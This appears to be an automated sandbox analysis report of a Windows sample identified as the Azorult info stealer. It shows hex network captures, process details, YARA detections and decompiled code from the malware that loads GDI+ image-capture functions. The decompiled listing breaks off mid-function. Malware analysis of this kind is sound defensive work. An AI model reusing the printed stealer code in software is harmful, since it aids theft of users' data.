                                                                                                                                                                                            Data Ascii: LzPAgzPXLLPXLLPXLLPXXAPAgPdPdPdPXLmPAvPmPdPXLmPXXPXPdPdPXgPAAAPXQPdPdPAdPdPXXdPXLmPAXPvPdPAAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPAgPAPdPAAXPXLmPAmPAPdPAAm
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818157911 CET2192INData Raw: 41 41 6d 50 41 41 4c 50 41 50 64 50 41 41 58 50 58 4c 6d 50 41 6d 50 58 50 64 50 41 41 4c 50 58 64 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 76 50 64 50 58 4c 6d 50 41 58 50 41 50 64 50 6d 64 50 41 50 64 50 64 50 6d 76 50 41 41 41 50 58 58 50
                                                                                                                                                                                            Data Ascii: AAmPAALPAPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAPXXPdPdPAdPXLmPAmPmPdPLiPLiPdPdPdPXLmPAvPmPdPmdPXvPdPdPAdPXLmPAmPLPdPXLmPAXPLPdPmdPXmPdPdPAdPXLmPAXPXPdPmdPXLPdPdPAdPXAzPXLmPAmPiPdPXLmPAXPvPdPXLmPAXPiPdPmdPXiPdPdPA
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818181038 CET2194INData Raw: 69 50 64 50 64 50 41 64 50 41 41 41 50 58 67 50 64 50 64 50 41 64 50 76 7a 50 64 50 58 4c 6d 50 41 76 50 6d 50 64 50 6d 64 50 58 7a 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 67 50 64 50 58 4c 6d 50 41 58 50 67 50 64 50 4c 7a 50 41 67 7a 50 58
                                                                                                                                                                                            Data Ascii: iPdPdPAdPAAAPXgPdPdPAdPvzPdPXLmPAvPmPdPmdPXzPdPdPAdPXLmPAmPgPdPXLmPAXPgPdPLzPAgzPXLLPXLLPXLLPXXAPAgPdPdPdPXLmPAvPmPdPXLmPXXPXPdPdPXgPAAAPXQPdPdPAdPdPXXdPXLmPAXPvPdPAAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvm
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818203926 CET2195INData Raw: 69 50 41 76 6d 50 64 50 41 67 50 64 50 64 50 64 50 64 50 58 67 50 6d 7a 50 58 50 64 50 41 67 6d 50 64 50 64 50 64 50 41 50 64 50 64 50 41 67 50 64 50 41 41 6d 50 41 51 50 58 50 64 50 41 41 58 50 58 4c 6d 50 41 6d 50 41 50 64 50 41 41 6d 50 6d 51
                                                                                                                                                                                            Data Ascii: iPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPAQPXPdPAAXPXLmPAmPAPdPAAmPmQPXPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAPXXPdPdPAdPXLmPAmPmPdPLiPLiPdPdPdPXLmPAvPmPdPmdPXvPdPdPAdPXLmPAmPLPdPXLmPAXPLPdPmdPXmPdPdP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.818227053 CET2196INData Raw: 64 50 64 50 41 64 50 58 4c 6d 50 41 58 50 58 50 64 50 6d 64 50 58 4c 50 64 50 64 50 41 64 50 58 41 7a 50 58 4c 6d 50 41 6d 50 69 50 64 50 58 4c 6d 50 41 58 50 76 50 64 50 58 4c 6d 50 41 58 50 69 50 64 50 6d 64 50 58 69 50 64 50 64 50 41 64 50 41
                                                                                                                                                                                            Data Ascii: dPdPAdPXLmPAXPXPdPmdPXLPdPdPAdPXAzPXLmPAmPiPdPXLmPAXPvPdPXLmPAXPiPdPmdPXiPdPdPAdPAAAPXgPdPdPAdPvzPdPXLmPAvPmPdPmdPXzPdPdPAdPXLmPAmPgPdPXLmPAXPgPdPLzPAgzPXLLPXLLPXLLPXXAPAgPdPdPdPXLmPAvPmPdPXLmPXXPXPdPdPXgPAAAPXQPdPdPAdPdPXXdPXLmPAXPvPdPAAAPvdP
                                                                                                                                                                                            Mar 2, 2021 20:35:53.819128036 CET2198INData Raw: 41 41 41 50 76 64 50 64 50 64 50 41 64 50 58 4c 6d 50 41 6d 50 64 50 64 50 4c 69 50 64 50 64 50 64 50 64 50 58 4c 6d 50 41 58 50 64 50 64 50 6d 58 50 64 50 64 50 41 50 41 69 50 64 50 64 50 58 50 64 50 58 7a 50 64 50 41 64 69 50 41 76 6d 50 64 50
                                                                                                                                                                                            Data Ascii: AAAPvdPdPdPAdPXLmPAmPdPdPLiPdPdPdPdPXLmPAXPdPdPmXPdPdPAPAiPdPdPXPdPXzPdPAdiPAvmPdPAgPdPdPdPdPXgPmzPXPdPAgmPdPdPdPAPdPdPAgPdPAAmPXALPXPdPAAXPXLmPAmPAPdPAAmPXvvPXPdPAAXPXLmPAmPXPdPAALPXdPdPdPAdPXLmPAmPvPdPXLmPAXPAPdPmdPAPdPdPmvPAAAPXXPdPdPAdPXLm


Session ID: 2
Source IP: 192.168.2.5
Source Port: 49721
Destination IP: 99.86.159.34
Destination Port: 80
Process: C:\Users\user\Desktop\e0YQRfcpqS.exe

Timestamp: Mar 2, 2021 20:35:54.651071072 CET
kBytes transferred: 2700
Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Other
Host: www.liverpoolfc.com
Connection: Keep-Alive

Timestamp: Mar 2, 2021 20:35:54.700747013 CET
kBytes transferred: 2701
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                            Server: CloudFront
                                                                                                                                                                                            Date: Tue, 02 Mar 2021 19:35:54 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 183
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Location: https://www.liverpoolfc.com/
                                                                                                                                                                                            X-Cache: Redirect from cloudfront
                                                                                                                                                                                            Via: 1.1 ec6f32a0d1c5fef22993e49d055871c2.cloudfront.net (CloudFront)
                                                                                                                                                                                            X-Amz-Cf-Pop: MXP64-C2
                                                                                                                                                                                            X-Amz-Cf-Id: vgTH6a1Frgxlx0SY-RKdLjknTxUsmw-vEOeovssZBFF5sx-bq_raJA==
                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                            HTTPS Packets

Timestamp: Mar 2, 2021 20:35:54.942744017 CET
Source IP: 99.86.159.103
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49722
JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad
Certificate chain:
• Subject: CN=*.liverpoolfc.com; Issuer: CN=Amazon, OU=Server CA 1B, O=Amazon, C=US; Not Before: Fri Feb 12 01:00:00 CET 2021; Not After: Mon Mar 14 00:59:59 CET 2022
• Subject: CN=Amazon, OU=Server CA 1B, O=Amazon, C=US; Issuer: CN=Amazon Root CA 1, O=Amazon, C=US; Not Before: Thu Oct 22 02:00:00 CEST 2015; Not After: Sun Oct 19 02:00:00 CEST 2025
• Subject: CN=Amazon Root CA 1, O=Amazon, C=US; Issuer: CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US; Not Before: Mon May 25 14:00:00 CEST 2015; Not After: Thu Dec 31 02:00:00 CET 2037
• Subject: CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US; Issuer: OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US; Not Before: Wed Sep 02 02:00:00 CEST 2009; Not After: Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:20:35:45
                                                                                                                                                                                            Start date:02/03/2021
                                                                                                                                                                                            Path:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:'C:\Users\user\Desktop\e0YQRfcpqS.exe'
                                                                                                                                                                                            Imagebase:0xf30000
                                                                                                                                                                                            File size:17744 bytes
                                                                                                                                                                                            MD5 hash:936100C988A1CADA3C86B057C019D1F0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:20:36:05
                                                                                                                                                                                            Start date:02/03/2021
                                                                                                                                                                                            Path:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\e0YQRfcpqS.exe
                                                                                                                                                                                            Imagebase:0x560000
                                                                                                                                                                                            File size:17744 bytes
                                                                                                                                                                                            MD5 hash:936100C988A1CADA3C86B057C019D1F0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: Azorult_1, Description: Azorult Payload, Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                                                                                                                                            • Rule: Azorult, Description: detect Azorult in memory, Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5786200767625d004414a82f907561e5b132a235e829cb8216213b4eed0feeaa
                                                                                                                                                                                              • Instruction ID: cfe0ca709ceff7f5e084d9fc352e12097885ff36fcd49a8bb670197aac4b9be0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5786200767625d004414a82f907561e5b132a235e829cb8216213b4eed0feeaa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3491A435E007198FCB04DBE4D8549EDBBBAFF8A314F158615E816AB3A0EB30A945CB54
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 031E8BAE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 031EF28A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 031EF28A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 716092398-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031EB246,?,?,?,?,?), ref: 031EB307
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031EB246,?,?,?,?,?), ref: 031EB307
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031E8C29,00000800,00000000,00000000), ref: 031E8E3A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031E8C29,00000800,00000000,00000000), ref: 031E8E3A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 031E74CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 031E8BAE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 031EF41D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 031E74CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 031EF41D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%


                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 094773fae22d5d779b0980f49daafc6ac6956618fe1327f7e8c45ef6d6220487
                                                                                                                                                                                              • Instruction ID: a915d8cee42406a237c83685c1ef1f83545f05cf00e2155356a73ce257403908
                                                                                                                                                                                              • Opcode Fuzzy Hash: 094773fae22d5d779b0980f49daafc6ac6956618fe1327f7e8c45ef6d6220487
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98C11CB98117668BD711EF64F98C1897BA1BB87328F70C308D1E12B6D9D7B4144ACF88
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00417B1A() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              				struct HINSTANCE__* _t2;
                                                                                                                                                                                              				struct HINSTANCE__* _t4;
                                                                                                                                                                                              				_Unknown_base(*)()* _t21;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *0x41c890 =  *0x41c890 - 1;
                                                                                                                                                                                              				if( *0x41c890 < 0) {
                                                                                                                                                                                              					_t2 = LoadLibraryA("crtdll.dll"); // executed
                                                                                                                                                                                              					 *0x41c868 = GetProcAddress(_t2, "wcscmp");
                                                                                                                                                                                              					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
                                                                                                                                                                                              					 *0x41c86c = GetProcAddress(_t4, "GdiplusStartup");
                                                                                                                                                                                              					 *0x41c870 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
                                                                                                                                                                                              					 *0x41c874 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
                                                                                                                                                                                              					 *0x41c878 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
                                                                                                                                                                                              					 *0x41c87c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
                                                                                                                                                                                              					 *0x41c880 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
                                                                                                                                                                                              					 *0x41c884 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
                                                                                                                                                                                              					 *0x41c888 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
                                                                                                                                                                                              					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
                                                                                                                                                                                              					 *0x41c88c = _t21;
                                                                                                                                                                                              					return _t21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t1;
                                                                                                                                                                                              			}








                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                                                                                                              • API String ID: 2574300362-2815069134
                                                                                                                                                                                              • Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                              • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                                                                                                                                                                                              • Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00418124(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v432;
                                                                                                                                                                                              				intOrPtr _v444;
                                                                                                                                                                                              				short _v446;
                                                                                                                                                                                              				char _v448;
                                                                                                                                                                                              				char _v1472;
                                                                                                                                                                                              				char _v1476;
                                                                                                                                                                                              				char _v1480;
                                                                                                                                                                                              				char _v1484;
                                                                                                                                                                                              				char _v1488;
                                                                                                                                                                                              				char _v1492;
                                                                                                                                                                                              				void* _t141;
                                                                                                                                                                                              				void* _t144;
                                                                                                                                                                                              				void* _t151;
                                                                                                                                                                                              				void* _t186;
                                                                                                                                                                                              				struct HINSTANCE__* _t193;
                                                                                                                                                                                              				struct HINSTANCE__* _t196;
                                                                                                                                                                                              				void* _t197;
                                                                                                                                                                                              				intOrPtr _t206;
                                                                                                                                                                                              				void* _t222;
                                                                                                                                                                                              				void* _t225;
                                                                                                                                                                                              				void* _t228;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v1476 = 0;
                                                                                                                                                                                              				_v1480 = 0;
                                                                                                                                                                                              				_v1484 = 0;
                                                                                                                                                                                              				_v1488 = 0;
                                                                                                                                                                                              				_v1492 = 0;
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				E00403980(_v12);
